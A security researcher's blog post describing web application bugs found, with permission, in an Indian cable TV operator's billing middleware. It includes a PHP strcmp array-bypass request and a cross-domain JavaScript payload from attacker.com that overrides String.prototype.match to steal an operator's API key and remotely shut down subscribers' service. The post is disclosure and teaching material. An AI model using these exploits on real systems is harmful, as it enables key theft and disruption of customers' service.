• Low hanging Web Application bugs in Digital Cable :Hacking Cable TV Networks Part 1

    Hacking your cable TV Networks: Low Hanging Web Application bugs in Digital Cable TV.


    Check out previous blog :http://www.garage4hackers.com/entry.php?b=2830
    Hacking Your Cable TV Networks : HITB Security Conference Part 0.


    We did two presentations on the security issues in Digital Cable TV network back in February at Nullcon[Goa] and another at HITB [Amsterdam ] . We disclosed few of the many security issues we reported to a large cable network operator in India. The main highlight of the talk was that we [Me & Ahamed Nafeez ] did the presentations wearing a traditional dress[lungi,mundu] used by the locals in Kerala . This was to appreciate all the help the natives did while conducting the research.



    Presentation material:

    The slides are available here: http://haxpo.nl/wp-content/uploads/2...ard-Style.pptx.
    But I would be writing a series of blogs and would explain the bugs in detail here.

    Instead of following the same pattern I used for my talk [Just explaining the bugs]. I think it would be fun to share with you the adventures we had while doing the research. If you are only interested in the bugs just head to bug section, else read on.

    It is hard to find any Hands on cable TV security materials on the internet. This is mainly because the infrastructure used by the cable operators are not easily available for every researcher. In our case we were lucky . From November 2013 I was working with one of the largest Cable TV networks in India who provides service to nearly 1 Million users. I agreed to a contract where we would do free security audits for the Cable operators infrastructure and in return they would allow me to publish my finds in any conference of my choice . And that was a sweet deal for me . I come from an application security background. And I had no clue about Digital cable networks an year back. So in the first blog post I would explain how I cracked the deal with the Cable Operators to audit their Infrastructure.


    Cracking the Deal:Meeting with the Chief Technical Officer of the Cable Company

    Unlike Internet where information is viewed with suspicion and misinformation can be quickly vetted through other sources, television is a one-to-many medium where there’s no quick way to identify a false broadcast. If someone hacks into a TV news stream and publishes a news stating that a riot has happened in the nearby city, then that could create a lot of panic in a country like India.
    Example Source: Hackers took control of TV feeds in Wenzhou China and streamed anti-communist slogans to millions of viewers. .

    This was the main punch line I used when trying to convince the CTO why to do a Penetration testing for their infrastructure. Since he has not seen any real world attacks on his infrastructure , he was not that convinced to give me the project. But in the end he asked me if I could find any issues from outside, sort of like a black box testing. And If I could find something serious in 2 week he would consider giving me an opportunity.

    Web Application bugs in Digital Cable TV :


    I have two weeks time and I need to find something quick. I started doing my homework and I learned one thing. There are nearly 1 million users for this service provider. And there are about 2000-3000 local cable operators, the local vendors who distributes the service to individual localities. All these 2000+ cable operators need to have some sort of application where they register their locality users, manages their billing operations etc. And there need to be some sort of centralized application to perform this operation. With some awesome google hacking techniques we were able to locate their centralized billing application aka Middleware server on the Internet [Woot Woot].

    Bug 1: Code execution on Billing Server

    In not much time I was able to Hijack the Middleware server . A small misconfiguration on their webserver lead to this hijack[ I am not allowed to talk about it]. What you see listed in the screenshot are all the connected Setup-box users who are clients to a particular local cable operator. If you notice those red buttons on left. Those could be used to remotely shutdown users cable service in case of a missing payment or something . This was more than enough to explain the criticality but I wanted to find more bugs so that it would be convincing.



    Bug 2 :Setup Box Hijack [STB]

    The above web application allowed one operator to transfer STB to another operator. So for example if a user rahul from city Delhi relocates to city Agra. Then user rahul could get his STB unregistered from the local operator [D] at Delhi and get it reassigned to operator [A ] at Agra and continue using the STB and cable service.

    In the web application there is an option that lists all Existing local operators .Now the transfer takes place on basis of an access key. Operator A need to notify Operator B about the transfer and share his access key to operator B. This Access key implementation was flawed.

    The pseudo code was some what similar:

    PHP Code: [View]
    <?php
    $
    $apikey "select api_key from apis where username=.'mysql_escape($username)'";
    $authenticated strcmp($apikey$_GET['key']);
    if (
    $authenticated == 0) {
    print 
    "Logged IN !";
    } else {
    print 
    "wrong API!";
    }
    ?>
    Old bug PHP < 5.3.* : Passing an array will bypass the check.



    Php version older than 5.3 strcmp() implementation does not do a strict type checking. And if the input to strcmp function is an array then it returns a Null + warning. So simply enter an array instead of Access-key string. localhost/program.php?key=hacked[] and were able to bypass the key check. Now with this bug any local operator would be able to hijack any other operators STB s with out having a valid access key.



    Bug 3: Cable TV Remote shutdown: CSRF bypass.




    Cable TV Operators control Clients via unique key [Chip ID] as seen in the screenshot.
    This is accomplished via API Keys specific to the logged in admin.The implementation was flawed.
    The bug allowed a remote cable operator visiting a malicious webpage to remotely shutdown all Digital Tv instances.

    API Key Implementation


    They had a super secret JS file, which gets dynamically loaded for a given admin.


    PHP Code: [View]
    <script src=“load_secrets.js”></script>
    They had some pretty cool anti-stealing code as well. 
    Code: [View]
    function checkUrl()
    {
      var url = get_current_url();
      return url.match(url+'$') == 'flappybirds.com';
    }
    if(checkUrl())
    {
      var api_key = "77d11aea20ff61c6d1e23f044";alert(api_key);
      populateFormFields(super_secret); // Injects this token into the hidden input fields
    } else{
      alert('Bad Domain !');
    }
    The Bypass:


    Attacker can load, <script src=“load_secrets.js”></script>
    But, checkAdmin() returns false and the attack would not work.But attacker can bypass this using,


    PHP Code: [View]
    // From attacker.com
    <script>
    String.prototype.match = function()
    {
      return [
    "flappybirds.com"];
    }
    </script>
    <script src=“http://cable-tv.com/api_keys/load_secrets.js”></script> 
    You should check out ahamed nafeez's slides from HITB to learn more cool similar js bugs.
    http://haxpo.nl/wp-content/uploads/2...ill-Itself.pdf

    We can host this code cross domain and make "String.prototype.match" , javascript .match() function to always return the value we specify . Any way if a local cable TV operator visits our page then we could now steal his API code hidden in the JS and then could use that to shut down all users in his locality . Remember the shutdown button I mentioned about in the previous bug. We used that shutdown feature to create a working POC. Check out the demo. Now any users cable access could be remotely shut down by an attacker.


    Imagine some attackers doing this shutdown hack at the time of World Cup, that would result in pandemonium. Any way these many low hanging bugs were enough to convince the CTO to give us the project. And woot woot we were given access to their infrastructure and a small garage to work . I would write about more bugs in the coming days . Just keep yourself updated via my twitter page http://twitter.com/fb1h2s or Grage fb page https://www.facebook.com/Garage4Hackers .

    Regards.
    Rahul Sasi

    This article was originally published in blog: Low hanging Web Application bugs in Digital Cable :Hacking Cable TV Networks Part 1 started by fb1h2s
  • G4H Facebook

  • G4H Twitter